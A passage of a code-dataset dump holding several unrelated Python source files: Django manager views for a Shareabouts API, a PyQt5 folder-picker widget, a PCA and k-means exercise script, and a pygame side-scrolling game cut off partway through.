'registration/change_password.html'\n form_class = forms.ChangePasswordForm\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n self.api = ShareaboutsApi(request)\n self.api.authenticate(request)\n\n self.password_uri = self.api.build_uri('password', username=request.user.username)\n\n return super(ChangePasswordView, self).dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(ChangePasswordView, self).get_context_data(**kwargs)\n next = self.request.GET.get('next', reverse('manager_index'))\n context['next'] = next\n return context\n\n def get_success_url(self):\n return self.request.POST.get('next', reverse('manager_index'))\n\n def form_valid(self, form):\n new_password = form.cleaned_data['new_password']\n self.api.send('PUT', self.password_uri, data=new_password, content_type='text/plain')\n return super(ChangePasswordView, self).form_valid(form)\n\n\n@login_required\ndef datasets_view(request, owner_name):\n api = ShareaboutsApi(request)\n api.authenticate(request)\n\n datasets_uri = api.build_uri('dataset_collection', username=owner_name)\n\n datasets = api.get(datasets_uri)\n for ds in datasets:\n ds['manage_uri'] = reverse('manager_dataset_detail',\n kwargs={'owner_name': owner_name,\n 'dataset_slug': ds['slug']})\n return render(request, \"manager/datasets.html\", {'datasets': datasets})\n\n\nclass DataSetFormMixin (BaseDataBlobFormMixin):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, *args, **kwargs):\n self.api = ShareaboutsApi(request)\n self.api.authenticate(request)\n\n self.datasets_uri = self.api.build_uri('dataset_collection', username=owner_name)\n self.special_fields = ('id', 'owner', 'display_name', 'slug')\n\n # TODO: just make this a keyword attribute with default value of None\n dataset_slug = None\n if args:\n dataset_slug = args[0]\n if 'dataset_slug' in kwargs:\n dataset_slug = kwargs['dataset_slug']\n\n if dataset_slug is not None:\n self.dataset_uri = self.api.build_uri('dataset_instance', username=owner_name, slug=dataset_slug)\n\n return super(DataSetFormMixin, self).dispatch(request, owner_name, *args, **kwargs)\n\n def read(self, request, owner_name, dataset_slug):\n # Retrieve the dataset data.\n dataset = self.api.get(self.dataset_uri)\n\n # Arrange the data fields for display on the form\n data_fields = self.make_data_fields_tuples(dataset)\n\n # Make sure that we refer to the v2 dataset root URL.\n if 'url' in dataset:\n dataset['url'] = dataset['url'].replace('api/v1', 'api/v2')\n\n return render(request, \"manager/dataset.html\", {\n 'dataset': dataset,\n 'data_fields': data_fields\n })\n\n def process_specific_fields(self):\n pass\n# owner = self.request.user.id # Needs to be a django.contrib.auth id\n# self.data_blob['owner'] = owner\n\n def initial(self, request, owner_name):\n return render(request, \"manager/dataset.html\", {'dataset': {'owner': {'username': owner_name}}})\n\n def create(self, request, owner_name):\n self.data_blob = data = request.POST.dict()\n self.process_data_blob()\n\n response = self.api.send('POST', self.datasets_uri, data)\n\n if response.status_code == 201:\n data = json.loads(response.text)\n messages.success(request, 'Successfully saved!')\n return redirect(reverse('manager_dataset_detail', kwargs=(\n {'owner_name': owner_name, 'dataset_slug': data['slug']})))\n\n else:\n messages.error(request, 'Error: ' + response.text)\n return redirect(request.get_full_path())\n\n def update(self, request, owner_name, 
dataset_slug):\n # Make a copy of the POST data, since we can't edit the original.\n self.data_blob = data = request.POST.dict()\n self.process_data_blob()\n\n # Send the save request\n response = self.api.send('PUT', self.dataset_uri, data)\n\n if response.status_code == 200:\n response_json = response.json()\n\n # Note that we end up with 200 even if the dataset is\n # renamed and we get redirected... this is *after* the redirect\n # completes.\n if response_json['slug'] == dataset_slug:\n messages.success(request, 'Successfully saved!')\n else:\n messages.warning(\n request,\n \"\"\"WARNING: The URL of this dataset has\n changed. This will affect lots of other URLs, notably\n your shareabouts client application(s) MUST be\n reconfigured to use the new dataset URL!\n It is: %s\"\"\" % response_json['url'],\n )\n new_url = reverse(\n 'manager_dataset_detail',\n kwargs={'owner_name': response_json['owner']['username'],\n 'dataset_slug': response_json['slug']})\n return redirect(new_url)\n else:\n messages.error(request, 'Error: ' + response.text)\n\n return redirect(request.get_full_path())\n\n def delete(self, request, owner_name, dataset_slug):\n # Send the delete request\n response = self.api.send('DELETE', self.dataset_uri)\n\n if response.status_code == 204:\n messages.success(request, 'Successfully deleted!')\n return redirect(reverse('manager_dataset_list', args=[owner_name]))\n else:\n messages.error(request, 'Error: ' + response.text)\n return redirect(request.get_full_path())\n\n\nclass NewDataSetView (DataSetFormMixin, View):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name):\n return super(NewDataSetView, self).dispatch(request, owner_name)\n\n def get(self, request, owner_name):\n return self.initial(request, owner_name)\n\n def post(self, request, owner_name):\n return self.create(request, owner_name)\n\n\nclass ExistingDataSetView (DataSetFormMixin, View):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, dataset_slug):\n return super(ExistingDataSetView, self).dispatch(request, owner_name, dataset_slug)\n\n def get(self, request, owner_name, dataset_slug):\n return self.read(request, owner_name, dataset_slug)\n\n def post(self, request, owner_name, dataset_slug):\n if request.POST.get('action') == 'save':\n return self.update(request, owner_name, dataset_slug)\n elif request.POST.get('action') == 'delete':\n return self.delete(request, owner_name, dataset_slug)\n else:\n # TODO ???\n pass\n\n\nclass DataSetReportingView (TemplateView):\n template_name = 'manager/dataset_reports.html'\n\n def get_context_data(self, **kwargs):\n context = super(DataSetReportingView, self).get_context_data(**kwargs)\n\n request, owner_name, dataset_slug = \\\n self.request, self.kwargs['owner_name'], self.kwargs['dataset_slug']\n\n api = ShareaboutsApi(request)\n api.authenticate(request)\n dataset_uri = api.build_uri('dataset_instance', username=owner_name, slug=dataset_slug)\n places_uri = api.build_uri('place_collection', username=owner_name, dataset_slug=dataset_slug)\n\n places = api.get(places_uri)\n dataset = api.get(dataset_uri)\n\n context['places'] = places\n context['dataset'] = dataset\n\n context['places_json'] = json.dumps(places)\n context['dataset_json'] = json.dumps(dataset)\n\n return context\n\n\nclass SubmissionMixin (BaseDataBlobFormMixin):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, dataset_slug, place_id, submission_type, *args, **kwargs):\n self.api = 
ShareaboutsApi(request)\n self.api.authenticate(request)\n\n self.dataset_uri = self.api.build_uri('dataset_instance', username=owner_name, slug=dataset_slug)\n self.place_uri = self.api.build_uri('place_instance', username=owner_name, dataset_slug=dataset_slug, pk=place_id)\n\n # TODO: use a keyword arg with a default value of None for pk\n pk = None\n if args:\n pk = args[0]\n if 'pk' in kwargs:\n pk = kwargs['pk']\n\n if pk is not None:\n self.submission_uri = self.api.build_uri('submission_instance', username=owner_name, dataset_slug=dataset_slug, place_pk=place_id, type=submission_type, pk=pk)\n\n self.special_fields = ('id', 'submitter_name', 'url', 'visible',\n 'created_datetime', 'updated_datetime', 'type',\n 'place', 'dataset', 'attachments')\n return super(SubmissionMixin, self).dispatch(request, owner_name, dataset_slug, place_id, submission_type, *args, **kwargs)\n\n def index(self, request, owner_name, dataset_slug, place_id, submission_type):\n # Retrieve the dataset data.\n dataset = self.api.get(self.dataset_uri)\n\n # Retrieve the place data.\n place = self.api.get(self.place_uri)\n\n submission_sets = place['submissions']\n for submission_set in submission_sets:\n # Don't bother with sets we didn't ask for. If submission_type is\n # 'submissions', then all sets are requested.\n if submission_type not in (submission_set['type'], 'submissions'):\n submission_set['is_shown'] = False\n continue\n\n # Retrieve each submission set.\n join_char = '&' if '?' in submission_set['url'] else '?'\n submission_set['submissions'] = self.api.get(join_char.join([submission_set['url'], 'include_invisible=true']))\n\n # Process some data for display\n submission_set['is_shown'] = True\n submission_set['label'] = submission_set['type'].replace('_', ' ').title()\n\n for submission in submission_set['submissions']:\n # Arrange the submission data fields for display in the table\n submission['data_fields'] = self.make_data_fields_tuples(submission)\n\n # Make the dates a little prettier\n submission['created_datetime'] = submission['created_datetime'].replace('T', ' ').replace('Z', ' GMT')\n submission['updated_datetime'] = submission['updated_datetime'].replace('T', ' ').replace('Z', ' GMT')\n\n return render(request, \"manager/place_submissions.html\", {\n 'place': place,\n 'dataset': dataset\n })\n\n def initial(self, request, owner_name, dataset_slug, place_id, submission_type):\n # Retrieve the dataset data.\n dataset = self.api.get(self.dataset_uri)\n\n # Retrieve the place and submission data.\n place = self.api.get(self.place_uri)\n\n return render(request, \"manager/place_submission.html\", {\n 'type': None if submission_type == 'submissions' else submission_type,\n 'place': place,\n 'dataset': dataset\n })\n\n def process_specific_fields(self):\n data = self.data_blob\n\n # Grab the submission type off of the form. 
This will be in a hidden\n # field if the submission type was known before-hand, or in a text\n # field if the user had to enter it.\n self.actual_submission_type = data['type']\n del data['type']\n\n # Fix the visibility to be either true or false (boolean)\n data['visible'] = ('visible' in data)\n\n def create(self, request, owner_name, dataset_slug, place_id, submission_type):\n # Make a copy of the POST data, since we can't edit the original.\n self.data_blob = data = request.POST.dict()\n self.process_data_blob()\n\n # Construct the submission_uri, taking into account the submission\n # type according to the POST variables.\n self.submissions_uri = self.api.build_uri('submission_collection', username=owner_name, dataset_slug=dataset_slug, place_pk=place_id, type=self.actual_submission_type)\n\n # Send the save request\n response = self.api.send('POST', self.submissions_uri, data)\n\n if response.status_code == 201:\n data = json.loads(response.text)\n submission_id = data.get('id')\n\n messages.success(request, 'Successfully saved!')\n return redirect(reverse('manager_place_submission_detail', args=[owner_name, dataset_slug, place_id, self.actual_submission_type, submission_id]))\n\n else:\n messages.error(request, 'Error: ' + response.text)\n return redirect(request.get_full_path())\n\n def read(self, request, owner_name, dataset_slug, place_id, submission_type, pk):\n # Retrieve the dataset data.\n dataset = self.api.get(self.dataset_uri)\n\n # Retrieve the place and submission data.\n place = self.api.get(self.place_uri)\n submission = self.api.get(self.submission_uri)\n\n # Arrange the submission data fields for display in the form\n data_fields = self.make_data_fields_tuples(submission)\n\n return render(request, \"manager/place_submission.html\", {\n 'place': place,\n 'dataset': dataset,\n 'submission': submission,\n 'type': submission_type,\n 'data_fields': data_fields\n })\n\n def update(self, request, owner_name, dataset_slug, place_id, submission_type, pk):\n # Make a copy of the POST data, since we can't edit the original.\n self.data_blob = data = request.POST.dict()\n self.process_data_blob()\n\n # Send the save request\n response = self.api.send('PUT', self.submission_uri, data)\n\n if response.status_code == 200:\n messages.success(request, 'Successfully saved!')\n\n else:\n messages.error(request, 'Error: ' + response.text)\n\n return redirect(request.get_full_path())\n\n def delete(self, request, owner_name, dataset_slug, place_id, submission_type, pk):\n # Send the delete request\n response = self.api.send('DELETE', self.submission_uri)\n\n if response.status_code == 204:\n messages.success(request, 'Successfully deleted!')\n return redirect(reverse('manager_place_submission_list', args=(owner_name, dataset_slug, place_id, submission_type)))\n\n else:\n messages.error(request, 'Error: ' + response.text)\n return redirect(request.get_full_path())\n\n\nclass SubmissionListView (SubmissionMixin, View):\n def get(self, request, owner_name, dataset_slug, place_id, submission_type):\n return self.index(request, owner_name, dataset_slug, place_id, submission_type)\n\n\nclass NewSubmissionView (SubmissionMixin, View):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, dataset_slug, place_id, submission_type):\n return super(NewSubmissionView, self).dispatch(request, owner_name, dataset_slug, place_id, submission_type)\n\n def get(self, request, owner_name, dataset_slug, place_id, submission_type):\n return self.initial(request, owner_name, 
dataset_slug, place_id, submission_type)\n\n def post(self, request, owner_name, dataset_slug, place_id, submission_type):\n return self.create(request, owner_name, dataset_slug, place_id, submission_type)\n\n\nclass ExistingSubmissionView (SubmissionMixin, View):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, dataset_slug, place_id, submission_type, pk):\n return super(ExistingSubmissionView, self).dispatch(request, owner_name, dataset_slug, place_id, submission_type, pk)\n\n def get(self, request, owner_name, dataset_slug, place_id, submission_type, pk):\n return self.read(request, owner_name, dataset_slug, place_id, submission_type, pk)\n\n def post(self, request, owner_name, dataset_slug, place_id, submission_type, pk):\n if request.POST.get('action') == 'save':\n return self.update(request, owner_name, dataset_slug, place_id, submission_type, pk)\n elif request.POST.get('action') == 'delete':\n return self.delete(request, owner_name, dataset_slug, place_id, submission_type, pk)\n else:\n # TODO ???\n pass\n\n\ndef download_places_view(request, owner_name, dataset_slug):\n api = ShareaboutsApi(request)\n api.authenticate(request)\n places_uri = api.build_uri('place_collection_table', username=owner_name, dataset_slug=dataset_slug)\n\n api_response = api.send('GET', places_uri, content_type='text/csv')\n places_csv = api_response.content\n\n response = HttpResponse(places_csv.decode('utf-8'), content_type='text/csv')\n response['Content-disposition'] = 'attachment; filename=places.csv'\n\n return response\n\ndef download_submissions_view(request, owner_name, dataset_slug, submission_type):\n api = ShareaboutsApi(request)\n api.authenticate(request)\n submissions_uri = api.build_uri('all_submissions_table', username=owner_name, dataset_slug=dataset_slug, type=submission_type)\n\n api_response = api.send('GET', submissions_uri, content_type='text/csv')\n submissions_csv = api_response.content\n\n response = HttpResponse(submissions_csv.decode('utf-8'), content_type='text/csv')\n response['Content-disposition'] = 'attachment; filename=' + submission_type + '.csv'\n\n return response\n","repo_name":"CrowdSpot/crowdspot-vagrant-box","sub_path":"apicrowdspot/src/sa_manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":30307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18279645401","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QFileDialog, QLabel, QMessageBox\n\n\nclass FindImage(QWidget):\n def __init__(self):\n super().__init__()\n\n self.version = 'v1.0.0'\n self.lbl_choose = QLabel(self)\n self.lbl_origin = QLabel(self)\n self.lbl_target = QLabel(self)\n self.btn_start = QPushButton(self)\n self.btn_path = QPushButton(self)\n\n self.init_ui()\n\n def init_ui(self):\n self.lbl_choose.setText('Please select the txt folder')\n self.lbl_choose.move(100, 80)\n\n self.lbl_origin.setText('Please select the source image folder')\n self.lbl_origin.move(100, 150)\n\n self.lbl_target.setText('Please select the target folder')\n self.lbl_target.move(100, 220)\n\n for widget in [self.lbl_choose, self.lbl_origin, self.lbl_target]:\n source_el_btn = QPushButton('Select path', self)\n source_el_btn.move(550, widget.geometry().y())\n # Bind the current widget explicitly; a bare lambda would capture only the last widget.\n source_el_btn.clicked.connect(lambda checked=False, w=widget: self.open_source_folder(w))\n\n # self.btn_path = QPushButton('Select path', self)\n # self.btn_path.move(550, 80)\n # self.btn_path.clicked.connect(lambda: self.open_source_folder(self.lbl_choose))\n\n # 
self.btn_start.setText('Start')\n # self.btn_start.clicked.connect(self.handle_start)\n # self.btn_start.move(550, 550)\n self.setGeometry(300, 300, 800, 400)\n self.setWindowTitle(f'findImage_{self.version}')\n self.show()\n\n def open_source_folder(self, control):\n path = QFileDialog.getExistingDirectory(self, \"Select the folder to watch\", \"/\") # starting path\n control.setText(path)\n\n def handle_start(self):\n print('kkk', self.lbl_choose)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = FindImage()\n sys.exit(app.exec_())\n","repo_name":"pepsiyoung/python-tools","sub_path":"src/PyQT/app/find_image.py","file_name":"find_image.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32583029231","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 14 16:22:37 2019\r\n\r\n@author: 29132\r\n\"\"\"\r\n\r\nimport scipy.io as scio\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt \r\nfrom featureNorm import featureNormalize\r\nfrom PCA import pca\r\nfrom DL import drawLine\r\nfrom prdata import projectData,recoverData\r\nfrom Displaydata import displayData\r\nimport matplotlib.image as mpimg \r\nfrom kMeansInit import kMeansInitCentroids\r\nfrom runkmeans import runkMeans\r\n# ================== Part 1: Load Example Dataset ===================\r\ndata1=scio.loadmat('ex7data1.mat')\r\nX=data1['X']\r\nplt.figure(0)\r\nplt.plot(X[:,0],X[:,1],'bo')\r\nplt.axis([0.5,6.5,2,8])\r\n\r\n# =============== Part 2: Principal Component Analysis ===============\r\n#% Before running PCA, it is important to first normalize X\r\n[X_norm, mu, sigma] = featureNormalize(X);\r\n[U, S] = pca(X_norm);\r\ndrawLine(mu, mu + 1.5 * S[0] * U[:,0].T)\r\ndrawLine(mu, mu + 1.5 * S[1] * U[:,1].T)\r\nprint('U(:,1) ={},{}'.format(U[0][0], U[1][0]));\r\n\r\n#=================== Part 3: Dimension Reduction ===================\r\nplt.figure(1)\r\nplt.plot(X_norm[:, 0], X_norm[:, 1], 'bo');\r\nplt.axis([-4,3,-4,3])\r\n#Project the data onto K = 1 dimension\r\nK = 1;\r\nZ = projectData(X_norm, U, K);\r\nprint('Projection of the first example:{}'.format(Z[0]));\r\n\r\nX_rec = recoverData(Z, U, K)\r\nprint('Approximation of the first example:{} {}'.format(X_rec[0][0], X_rec[0][1]))\r\n#Draw lines connecting the projected points to the original points\r\nplt.figure()\r\nplt.plot(X_rec[:,0],X_rec[:,1],'ro')\r\nfor i in range(X_norm.shape[0]):\r\n plt.plot([X_norm[i,0], X_rec[i,0]], [X_norm[i,1], X_rec[i,1]], 'k-', linewidth=1)\r\n\r\n#=============== Part 4: Loading and Visualizing Face Data =============\r\ndata2=scio.loadmat('ex7faces.mat')\r\nX=data2['X']\r\ndisplayData(X[0:100, :]);\r\n\r\n#=========== Part 5: PCA on Face Data: Eigenfaces ===================\r\n[X_norm, mu, sigma] = featureNormalize(X)\r\n[U, S] = pca(X_norm)\r\ndisplayData(U[:, 0:36].T)\r\n\r\n#============= Part 6: Dimension Reduction for Faces =================\r\nK = 100;\r\nZ = projectData(X_norm, U, K);\r\n\r\n#==== Part 7: Visualization of Faces after PCA Dimension Reduction ====\r\nK = 100;\r\nX_rec = recoverData(Z, U, K);\r\n#Display normalized data\r\nplt.subplot(1, 2, 1);\r\ndisplayData(X_norm[0:100,:]);\r\nplt.title('Original faces');\r\n\r\n#Display reconstructed data from only k eigenfaces\r\nplt.subplot(1, 2, 2);\r\ndisplayData(X_rec[0:100,:]);\r\nplt.title('Recovered faces');\r\n\r\n#=== Part 8(a): Optional (ungraded) Exercise: PCA for Visualization ===\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nA = mpimg.imread('bird_small.png')\r\nK = 16; \r\nmax_iters = 
10;\r\nimg_size=A.shape\r\nX =A.reshape(img_size[0] * img_size[1], 3);\r\ninitial_centroids=kMeansInitCentroids(X,K)\r\n[centroids, idx] = runkMeans(X, initial_centroids, max_iters,False)\r\nrandidx=np.arange(1000)\r\nnp.random.shuffle(randidx);\r\nfig = plt.figure()\r\nax = Axes3D(fig)\r\nfor i in range(len(randidx)):\r\n ax.scatter(X[randidx[i]][0],X[randidx[i]][1],X[randidx[i]][2])\r\nplt.title('Pixel dataset plotted in 3D. Color shows centroid memberships')\r\n\r\n# === Part 8(b): Optional (ungraded) Exercise: PCA for Visualization ===\r\n[X_norm, mu, sigma] = featureNormalize(X)\r\n[U, S] = pca(X_norm);\r\nZ = projectData(X_norm, U, 2);\r\nplt.figure()\r\nfor i in range(len(randidx)):\r\n plt.scatter(Z[randidx[i],0],Z[randidx[i],1])\r\nplt.title('Pixel dataset plotted in 2D, using PCA for dimensionality reduction')","repo_name":"xiaoxue11/machine_learning","sub_path":"ex7/ex7_pca.py","file_name":"ex7_pca.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36136726199","text":"import pygame \r\nfrom sys import exit\r\nfrom random import randint, choice\r\n#First line we need in pygame.\r\n#It starts pygame and initializes stuffs in it.\r\n#It's like starting a car.\r\n\r\nclass Player(pygame.sprite.Sprite):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n player_walk_1 = pygame.image.load(\"graphics/player/player_walk_1.png\").convert_alpha()\r\n player_walk_2 = pygame.image.load(\"graphics/player/player_walk_2.png\").convert_alpha()\r\n self.player_walk = [player_walk_1,player_walk_2]\r\n self.player_index = 0\r\n self.player_jump = pygame.image.load(\"graphics/player/jump.png\").convert_alpha()\r\n\r\n self.image = self.player_walk[self.player_index]\r\n self.rect = self.image.get_rect(midbottom = (80,232))\r\n self.gravity = 0\r\n\r\n self.jump_sound = pygame.mixer.Sound(\"audio/jump.mp3\")\r\n self.jump_sound.set_volume(0.5)\r\n #Makes player jump. 
- code with same functionality exists in while loop.\r\n def player_input(self):\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_SPACE] and self.rect.bottom >= 232:\r\n self.gravity = -20\r\n self.jump_sound.play()\r\n\r\n def apply_gravity(self):\r\n self.gravity += 1\r\n self.rect.y += self.gravity\r\n if self.rect.bottom >= 232:\r\n self.rect.bottom = 232\r\n\r\n def animation_state(self):\r\n if self.rect.bottom < 232:\r\n self.image = self.player_jump\r\n else:\r\n self.player_index += 0.1\r\n if self.player_index >= len(self.player_walk): self.player_index = 0\r\n self.image = self.player_walk[int(self.player_index)]\r\n def update(self):\r\n self.player_input()\r\n self.apply_gravity()\r\n self.animation_state()\r\n\r\nclass Obstacle(pygame.sprite.Sprite):\r\n def __init__(self,type):\r\n super().__init__()\r\n\r\n if type == \"fly\":\r\n fly_1 = pygame.image.load(\"graphics/fly/fly1.png\").convert_alpha()\r\n fly_2 = pygame.image.load(\"graphics/fly/fly2.png\").convert_alpha()\r\n self.frames = [fly_1,fly_2]\r\n y_pos = 210\r\n else:\r\n snail_1 = pygame.image.load('graphics/snail/snail1.png').convert_alpha()\r\n snail_2 = pygame.image.load('graphics/snail/snail2.png').convert_alpha()\r\n self.frames = [snail_1,snail_2]\r\n y_pos = 232\r\n\r\n self.animation_index = 0\r\n self.image = self.frames[self.animation_index]\r\n self.rect = self.image.get_rect(midbottom = (randint(900,1100),y_pos))\r\n\r\n def animation_state(self):\r\n self.animation_index += 0.1\r\n if self.animation_index >= len(self.frames): self.animation_index = 0\r\n self.image = self.frames[int(self.animation_index)]\r\n\r\n def update(self):\r\n self.animation_state()\r\n self.rect.x -= 6\r\n self.destroy()\r\n\r\n def destroy(self):\r\n if self.rect.x <= 100:\r\n self.kill() \r\n\r\n\r\npygame.init()\r\n\r\ndef obstacle_movement(obstacle_list):\r\n\r\n if obstacle_list:\r\n for obstacle_rect in obstacle_list:\r\n obstacle_rect.x -= 5\r\n\r\n if obstacle_rect.bottom == 300: \r\n screen.blit(snail_surface, obstacle_rect)\r\n else:\r\n screen.blit(fly_surf, obstacle_rect)\r\n\r\n obstacle_list = [obstacle for obstacle in obstacle_list if obstacle.x > - 100]\r\n return obstacle_list #Used to make code in function a global variable, instead of using the \"global\" key word.\r\n else: return []\r\n\r\ndef collisions(player,obstacles):\r\n if obstacles:\r\n for obstacle_rect in obstacles:\r\n if player.colliderect(obstacle_rect): return False\r\n return True\r\n\r\ndef collision_sprite():\r\n if pygame.sprite.spritecollide(player.sprite,obstacle_group,False):\r\n obstacle_group.empty()\r\n return False\r\n else: return True\r\n\r\ndef display_score():\r\n current_time = int(pygame.time.get_ticks() / 1000) - start_time\r\n score_surf = text_font.render(f'Score: {current_time}', False, (64,64,64))\r\n score_rect = score_surf.get_rect(center = (400,50))\r\n screen.blit(score_surf, score_rect)\r\n return current_time\r\n \r\ndef player_animation():\r\n global player_surf, player_index\r\n\r\n if player_rect.bottom < 232:\r\n player_surf = player_jump\r\n else: \r\n player_index += 0.1\r\n if player_index >= len(player_walk):player_index = 0\r\n player_surf = player_walk[int(player_index)]\r\n\r\n\r\n\r\n #play walking anime if player is on floor.\r\n #display jump surface if player not on floor.\r\n\r\n#Creating a display surface - the window the user will see.\r\nscreen = pygame.display.set_mode((800,400))\r\n#Name of game window.\r\npygame.display.set_caption(\"Gamer\")\r\n\r\n#MAXIMUM FRAME RATE.\r\n#Clock 
object to help with time and controlling the frame rate.\r\nclock = pygame.time.Clock()\r\ngame_active = False\r\nstart_time = 0\r\nscore = 0\r\nmusic = pygame.mixer.Sound(\"audio/music.wav\")\r\nmusic.play(loops = -1)\r\n\r\n#GROUPS\r\nplayer = pygame.sprite.GroupSingle()\r\nplayer.add(Player())\r\nobstacle_group = pygame.sprite.Group()\r\n\r\n#Font\r\ntext_font = pygame.font.Font('font/Pixeltype.ttf', 30)\r\n#Sky image.\r\nsky_surface = pygame.image.load(\"graphics/hallo-sky.png\").convert()\r\n#Ground image.\r\nground_surface = pygame.image.load(\"graphics/ground.png\").convert()\r\n\"\"\"\r\nscore_surf = text_font.render(\"SCORE\", False, (64, 64, 64))\r\nscore_rect = score_surf.get_rect(center = (40, 15))\r\n\"\"\"\r\n\r\n#Obstacles\r\n#Snail\r\nsnail_frame_1 = pygame.image.load(\"graphics/snail/snail1.png\").convert_alpha()\r\nsnail_frame_2 = pygame.image.load(\"graphics/snail/snail2.png\").convert_alpha()\r\nsnail_frames = [snail_frame_1, snail_frame_2]\r\nsnail_frame_index = 0\r\nsnail_surface = snail_frames[snail_frame_index]\r\nsnail_x = 600\r\nsnail_rect = snail_surface.get_rect(topleft = (snail_x,200))\r\n\r\n\r\n#Fly\r\nfly_frame_1 = pygame.image.load(\"graphics/fly/fly1.png\").convert_alpha()\r\nfly_frame_2 = pygame.image.load(\"graphics/fly/fly2.png\").convert_alpha()\r\nfly_frames = [fly_frame_1, fly_frame_2]\r\nfly_frame_index = 0\r\nfly_surf = fly_frames[fly_frame_index]\r\n\r\n\r\nobstacle_rect_list = []\r\n\r\nplayer_walk_1 = pygame.image.load(\"graphics/player/player_walk_1.png\").convert_alpha()\r\nplayer_walk_2 = pygame.image.load(\"graphics/player/player_walk_2.png\").convert_alpha()\r\nplayer_walk = [player_walk_1,player_walk_2]\r\nplayer_index = 0\r\nplayer_jump = pygame.image.load(\"graphics/player/jump.png\").convert_alpha()\r\n\r\nplayer_surf = player_walk[player_index]\r\nplayer_rect = player_surf.get_rect(midbottom = (80,230))\r\n#GRAVITY\r\nplayer_gravity = 0\r\n#MENU\r\nplayer_stand = pygame.image.load(\"graphics\\Player\\player_stand.png\").convert_alpha()\r\nplayer_stand = pygame.transform.rotozoom(player_stand,0,2)\r\nplayer_stand_rect = player_stand.get_rect(center=(400,200))\r\n#MENU'S FONT\r\ntitle_font = text_font.render(\"Grapple One\", False, \"green\") #Font surface\r\ntitle_rect = title_font.get_rect(midbottom = (400,100))\r\n#Instruction\r\nmsg = text_font.render(\"Press SPACE to start\", False, \"green\")\r\nmsg_rect = msg.get_rect(midtop=(400, 300))\r\n\r\n#TIMER\r\nobstacle_timer = pygame.USEREVENT + 1\r\npygame.time.set_timer(obstacle_timer, 1500) #Triggers event in certain intervals.\r\n\r\nsnail_animation_timer = pygame.USEREVENT + 2\r\npygame.time.set_timer(snail_animation_timer, 500)\r\n\r\nfly_animation_timer = pygame.USEREVENT + 3\r\npygame.time.set_timer(fly_animation_timer, 200)\r\n\r\n\r\n#Keeps code running forever.\r\nwhile True:\r\n for event in pygame.event.get():\r\n #Used to close the window. 
without it the window will keep on running without closing.\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n #Most secure way to close pygame is to use the \"sys module.\" \"exit()\" is imported from the sys module.\r\n exit()\r\n \r\n if game_active:\r\n #MOUSE POSITION.\r\n if event.type == pygame.MOUSEBUTTONDOWN: \r\n if player_rect.collidepoint(event.pos) and player_rect.bottom >= 232: \r\n player_gravity = -20\r\n \r\n #KEYBOARD INPUT CONTROLS USING EVENTS.\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_SPACE and player_rect.bottom >= 232:\r\n player_gravity = -20\r\n\r\n #TIMER FOR SNAIL.\r\n if event.type == snail_animation_timer:\r\n if snail_frame_index == 0: snail_frame_index = 1\r\n else: snail_frame_index = 0\r\n snail_surface = snail_frames[snail_frame_index]\r\n\r\n #TIMER FOR FLY.\r\n if event.type == fly_animation_timer:\r\n if fly_frame_index == 0: fly_frame_index = 1\r\n else: fly_frame_index = 0\r\n fly_surf = fly_frames[fly_frame_index]\r\n\r\n else:\r\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\r\n game_active = True\r\n snail_rect.left = 800 \r\n start_time = int(pygame.time.get_ticks()/1000)\r\n\r\n\r\n if event.type == obstacle_timer:\r\n obstacle_group.add(Obstacle(choice([\"fly\",\"snail\",\"snail\",\"snail\",])))\r\n \"\"\"\r\n if randint(0,2):\r\n obstacle_rect_list.append(snail_surface.get_rect(topleft = (randint(900,1100),200)))\r\n else:\r\n obstacle_rect_list.append(fly_surf.get_rect(topleft = (randint(900,1100),110)))\r\n \"\"\"\r\n if game_active:\r\n\r\n screen.blit(sky_surface,(0, 0))\r\n screen.blit(ground_surface, (0,232))\r\n \r\n score = display_score() \r\n\r\n #Obstacle movement.\r\n #obstacle_rect_list = obstacle_movement(obstacle_rect_list)\r\n \r\n #Collisions\r\n game_active = collision_sprite()\r\n #game_active = collisions(player_rect, obstacle_rect_list)\r\n #SIMULATION GROUND COLLISION. 
\r\n if player_rect.bottom >= 232:\r\n player_rect.bottom = 232\r\n\r\n \r\n #PLAYER\r\n \"\"\"\r\n player_gravity += 1\r\n player_rect.y += player_gravity\r\n screen.blit(player_surf, player_rect )\r\n screen.blit(snail_surface, snail_rect)\r\n snail_rect.left -= 3\r\n if snail_rect.right <= 0: snail_rect.left = 800\r\n player_animation()\r\n \"\"\"\r\n player.draw(screen)\r\n player.update()\r\n\r\n obstacle_group.draw(screen)\r\n obstacle_group.update()\r\n\r\n #COLLISION \r\n if snail_rect.colliderect(player_rect):\r\n #pygame.quit()\r\n #exit() \r\n game_active = False\r\n \r\n else:\r\n #EXITS TO MENU SCREEN IF GAME IS OVER.\r\n mnu = pygame.image.load(\"graphics/menu-screen.png\")\r\n mnu = pygame.transform.scale(mnu, (800, 400))\r\n mnu_rect = mnu.get_rect()\r\n mnu_rect = mnu_rect.move((0, 0))\r\n\r\n screen.blit(mnu, mnu_rect)\r\n #screen.fill((94, 129, 162))\r\n screen.blit(player_stand,player_stand_rect)\r\n obstacle_rect_list.clear()\r\n player_rect.midbottom = (80,230)\r\n player_gravity = 